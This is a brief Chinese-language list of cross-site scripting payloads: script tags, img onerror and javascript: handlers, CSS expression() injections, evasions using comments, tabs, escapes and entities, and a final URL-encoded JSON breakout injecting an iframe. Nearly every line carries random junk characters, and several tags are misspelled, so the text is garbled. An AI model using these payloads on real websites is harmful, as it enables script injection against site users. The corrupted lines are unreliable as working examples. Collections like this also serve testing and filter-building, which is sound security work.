<script>alert("跨站")</script> (最常用)- o4 E# I' c* j% P! k O
<img scr=javascript:alert("跨站")></img>+ k' ?& b0 L; p& w5 X4 D. }4 ^
<img scr="javascript: alert(/跨站/)></img>5 O. B0 J5 h* {: S
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
# i. l) ~$ @8 P* a<img scr="#" onerror=alert(/跨站/)></img>
: p- S) ?. |, f! O Q, l" F- |; X<img scr="#" style="xss:expression(alert(/xss/));"></img>
2 P) g& y- ~* A( x* s<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)1 D' K8 V. g" X; p) @5 A$ }
<img src=vbscript:msgbox ("xss")></img>
" v0 Q6 Z) T& W1 o<style> input {left:expression (alert('xss'))}</style>
: X0 s6 `" i$ ^2 A. F<div style={left:expression (alert('xss'))}></div> a' r! k' G+ G0 h: x: H0 S* X3 ?
<div style={left:exp/* */ression (alert('xss'))}></div>
8 ~$ q0 h# w. x9 V<div style={left:\0065\0078ression (alert('xss'))}></div>
1 ^( ]5 {' h# T# ~( nhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>2 Q0 i5 M7 l2 H, T
unicode <div style="{left:expRessioN (alert('xss'))}">* T9 W9 U" y2 I+ n
4 w# ^+ Z' r+ X! _
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
; P) z! z3 Y6 C6 s3 `1 d" Z @ |